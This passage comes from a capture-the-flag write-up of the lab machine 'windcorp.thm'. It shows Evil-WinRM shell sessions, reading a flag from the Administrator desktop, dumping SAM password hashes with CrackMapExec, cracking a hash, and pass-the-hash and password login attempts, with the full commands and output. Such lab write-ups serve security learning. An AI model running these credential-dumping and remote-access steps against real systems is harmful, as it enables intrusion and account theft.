*Evil-WinRM* PS C:\scripts> cat log.txt
Last run: 02/08/2022 19:23:56
*Evil-WinRM* PS C:\scripts> Get-LocalUser "stimpz0r"
Name Enabled Description
---- ------- -----------
stimpz0r True
- Finally, let’s test out our new access:
❯ evil-winrm -i windcorp.thm -u stimpz0r -p r00t3d!
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\stimpz0r\Documents> whoami
windcorp\stimpz0r
*Evil-WinRM* PS C:\Users\stimpz0r\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
- We are here for one last thing (flag)…
LOOT >> Flag3.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat Flag3.txt
<REDACTED>
FLAG - Flag3.txt
PRIVESC? >> that juicy Administrator password…
- I managed to extract the NTLM hash from the Administrator account using CrackMapExec:
❯ crackmapexec smb 10.10.26.119 -u stimpz0r -p r00t3d! --sam
SMB 10.10.26.119 445 FIRE [*] Windows 10.0 Build 17763 x64 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB 10.10.26.119 445 FIRE [+] windcorp.thm\stimpz0r:r00t3d! (Pwn3d!)
SMB 10.10.26.119 445 FIRE [+] Dumping SAM hashes
SMB 10.10.26.119 445 FIRE Administrator:500:aad3b435b51404eeaad3b435b51404ee:a47c1e6ce2d356a67cde3a743b465b16:::
SMB 10.10.26.119 445 FIRE Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.26.119 445 FIRE DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ERROR:root:SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
SMB 10.10.26.119 445 FIRE [+] Added 3 SAM hashes to the database
- And, Crackstation managed to crack the hash:
- BUT – no dice… 🙁
❯ crackmapexec smb 10.10.26.119 -u Administrator -p Secret1234
SMB 10.10.26.119 445 FIRE [*] Windows 10.0 Build 17763 x64 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB 10.10.26.119 445 FIRE [-] windcorp.thm\Administrator:Secret1234 STATUS_LOGON_FAILURE
❯ crackmapexec winrm 10.10.26.119 -u Administrator -H a47c1e6ce2d356a67cde3a743b465b16
WINRM 10.10.26.119 5985 FIRE [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm)
WINRM 10.10.26.119 5985 FIRE [*] http://10.10.26.119:5985/wsman
WINRM 10.10.26.119 5985 FIRE [-] windcorp.thm\Administrator:a47c1e6ce2d356a67cde3a743b465b16
❯ evil-winrm -i windcorp.thm -u Administrator -p Secret1234
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1